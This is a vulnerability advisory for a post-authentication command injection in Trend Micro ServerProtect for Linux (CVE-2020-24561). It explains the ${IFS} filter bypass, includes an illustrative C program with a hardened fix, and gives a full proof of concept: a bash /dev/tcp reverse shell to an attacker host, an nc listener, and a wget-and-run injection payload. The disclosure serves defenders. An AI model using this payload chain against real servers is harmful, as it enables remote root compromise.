DESCRIPTION
Trend Micro ServerProtect for Linux (ServerProtect) provides comprehensive protection against viruses, worms, Trojans, and spyware/grayware targeted at file servers based on the Linux operating system. Managed through an intuitive portable Web-based console, ServerProtect provides centralized virus/malware scanning, pattern updates, event reporting, and antivirus configuration.
More information at https://success.trendmicro.com/product-support/serverprotect-for-linux.
SUMMARY
PRODUCT | ServerProtect for Linux |
---|---|
VENDOR | Trend Micro |
AFFECTED VERSIONS | All versions prior to 3.0 Repack 2 |
SEVERITY | CRITICAL |
IDENTIFIER | CVE-2020-24561 |
TESTED PLATFORM | SPLX30-64 for CentOS 8.0 / Redhat8 |
A command injection vulnerability exists in ServerProtect for Linux: `log_management.cgi` passes an input parameter into a system command without sanitizing it. Exploitation requires logging in as administrator, after which an attacker can execute arbitrary commands on the server (remote code execution).
IMPACT
Post-Auth Remote Code Execution.
DETAILS
Once installed, ServerProtect runs with root privileges.
ServerProtect exposes a web interface; on a fresh install, the administrator login has a null (empty) password.
**Log Directory** is a page where the user specifies where log files are stored. If the directory does not exist yet, a form pops up asking whether it should be created.
After the save request is submitted, the new directory is written to `/opt/TrendMicro/SProtectLinux/tmsplx.xml`. The application then invokes the **xmlvalidator** binary in `/opt/TrendMicro/SProtectLinux/SPLX.util/` to parse this *xml* file.
Reverse engineering **xmlvalidator** showed that, if the directory does not exist yet, it creates it by calling `system(command)`. The `command` string starts as
`command = "/bin/mkdir -p -m 0700" `,
and the new directory *NEW_PATH* entered in the web interface is then appended, followed by an output redirect:
`command += NEW_PATH + ">/dev/null 2>&1"`
Because *NEW_PATH* is concatenated into the string unquoted and unvalidated, any shell metacharacters it contains are interpreted by the shell that `system()` spawns, so we can inject arbitrary commands through it.
Our first attempt, injecting `touch ECQPoC`, did not work: the application inserts a backslash before each space, so the shell receives `touch\ ECQPoC` as a single word. We bypassed the filter with `${IFS}`, which the shell expands to whitespace and which contains no space character for the filter to escape.
The injected command thus became `touch${IFS}ECQPoC`, and the full value sent in the `T1` parameter was `/a;touch${IFS}ECQPoC`. Since the JavaScript in the web client rejects special characters, the request has to be intercepted and modified in **BurpSuite** rather than submitted through the form.
The file `ECQPoC` was then found at `/opt/TrendMicro/SProtectLinux/ECQPoC`, confirming that the injected command executed.
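As an added example (not Trend Micro's code; the function names, the exact escaping rule and the allow-list are reconstructions based only on the behaviour described above), the following C program rebuilds the vulnerable command construction, shows why escaping spaces does not stop the `${IFS}` payload, and places a hardened version beside it that validates the path against an allow-list and calls `mkdir(2)` directly instead of going through a shell:

```c
/* Added example, not Trend Micro's code. Reconstructs the command
 * construction described in the advisory; function names, the escaping
 * rule and the allow-list are assumptions made for illustration. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>

#define CMD_MAX 4096

/* Assumed filter: a backslash is put before every space. Nothing else is
 * touched, so ';', '$', '{' and '}' reach the shell unchanged. */
size_t escape_spaces(const char *in, char *out, size_t outlen)
{
    size_t n = 0;
    for (; *in != '\0' && n + 2 < outlen; in++) {
        if (*in == ' ')
            out[n++] = '\\';
        out[n++] = *in;
    }
    out[n] = '\0';
    return n;
}

/* Vulnerable pattern: the user-controlled path is concatenated, unquoted,
 * into a command line meant for system(). Only builds the string; it is
 * never executed here. Returns 0 on success, -1 if it would not fit. */
int build_mkdir_command(const char *new_path, char *cmd, size_t cmdlen)
{
    char escaped[CMD_MAX];
    escape_spaces(new_path, escaped, sizeof escaped);
    int r = snprintf(cmd, cmdlen, "/bin/mkdir -p -m 0700 %s >/dev/null 2>&1",
                     escaped);
    return (r < 0 || (size_t)r >= cmdlen) ? -1 : 0;
}

/* True if the (already filtered) string still carries bytes the shell
 * interprets: the filter above leaves every one of these alone. */
int contains_shell_metachar(const char *s)
{
    return strpbrk(s, ";|&`$(){}<>\n") != NULL;
}

/* Hardened check: absolute path, allow-listed characters only, no "..".
 * Deliberately conservative; a log directory never needs anything else. */
int is_safe_path(const char *path)
{
    if (path == NULL || path[0] != '/')
        return 0;
    for (const char *p = path; *p != '\0'; p++) {
        int ok = (*p >= 'a' && *p <= 'z') || (*p >= 'A' && *p <= 'Z') ||
                 (*p >= '0' && *p <= '9') || *p == '/' || *p == '_' ||
                 *p == '-' || *p == '.';
        if (!ok)
            return 0;
    }
    return strstr(path, "..") == NULL;
}

/* Hardened creation: the equivalent of `mkdir -p` done with mkdir(2) per
 * path component. No shell is involved, so no byte of the path can be
 * interpreted as syntax even if the allow-list were later relaxed. */
int safe_mkdir_p(const char *path, mode_t mode)
{
    char buf[CMD_MAX];
    size_t len;

    if (!is_safe_path(path)) {
        errno = EINVAL;
        return -1;
    }
    len = strlen(path);
    if (len + 1 > sizeof buf) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(buf, path, len + 1);
    for (char *p = buf + 1; *p != '\0'; p++) {
        if (*p == '/') {
            *p = '\0';
            if (mkdir(buf, mode) != 0 && errno != EEXIST)
                return -1;
            *p = '/';
        }
    }
    if (mkdir(buf, mode) != 0 && errno != EEXIST)
        return -1;
    return 0;
}

int main(void)
{
    const char *payload = "/a;touch${IFS}ECQPoC"; /* the advisory's T1 value */
    char escaped[CMD_MAX], cmd[CMD_MAX];

    escape_spaces(payload, escaped, sizeof escaped);
    build_mkdir_command(payload, cmd, sizeof cmd);
    printf("filtered path : %s\n", escaped);
    printf("command string: %s\n", cmd);
    printf("shell metacharacters survive the filter: %s\n",
           contains_shell_metachar(escaped) ? "yes" : "no");
    printf("hardened validator accepts payload: %s\n",
           is_safe_path(payload) ? "yes" : "no");

    /* Hardened path in action; the /tmp location is for the demo only. */
    if (safe_mkdir_p("/tmp/splx_example/logs", 0700) == 0)
        printf("created /tmp/splx_example/logs without a shell\n");
    else
        perror("safe_mkdir_p");
    return 0;
}
```

The point the two halves make together: the space filter only breaks word splitting, never the `;` separator, so once `${IFS}` restores the split the injected command runs unchanged. The fix is not a better escape but removing the shell from the path entirely and rejecting anything that is not a plain absolute path.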
PROOF OF CONCEPT
As a proof of concept, we created a reverse shell that connects back to our server.
First, we placed a simple reverse-shell script named `index.html` on our server; `192.168.1.109` is the attacker host and `31337` is the port it listens on:
```
#!/bin/bash
# Interactive bash with stdin, stdout and stderr redirected over TCP to the listener
bash -i >& /dev/tcp/192.168.1.109/31337 0>&1
```
Then we served it over HTTP on port `5555` with Python's SimpleHTTPServer:
`$ python2 -m SimpleHTTPServer 5555`
In another terminal, we listened on port `31337` for the reverse shell:
`$ nc -lvp 31337`
Then we sent a POST request to `https://HOST:14943/SProtectLinux/log_management.cgi?` (intercepted and modified in BurpSuite, as above) with the following payload in the `T1` parameter; `wget` with no path fetches the root document and saves it as `index.html`, which `bash` then runs:
`/b;wget${IFS}192.168.1.109:5555;bash${IFS}index.html`
VENDOR STATUS
Trend Micro has released a new Critical Patch (CP) for Trend Micro ServerProtect for Linux 3.0, which resolves a command injection vulnerability in the product. https://success.trendmicro.com/solution/000268419
CREDIT
Thai Nguyen
DISCLOSURE TIMELINE
Date | Summary |
---|---|
26/10/2018 | Vulnerability discovered |
23/07/2020 | ECQ sent the advisory to Trend Micro Vulnerability Response Team (TMVR) |
23/07/2020 | TMVR Team received report and submitted to the relevant technical team |
13/08/2020 | TMVR Team validated issue and planning to release a Critical Patch |
16/09/2020 | TMVR Team released the solution and security bulletin for the vulnerability report |
17/05/2021 | Advisory Published |
APPENDIX
N/A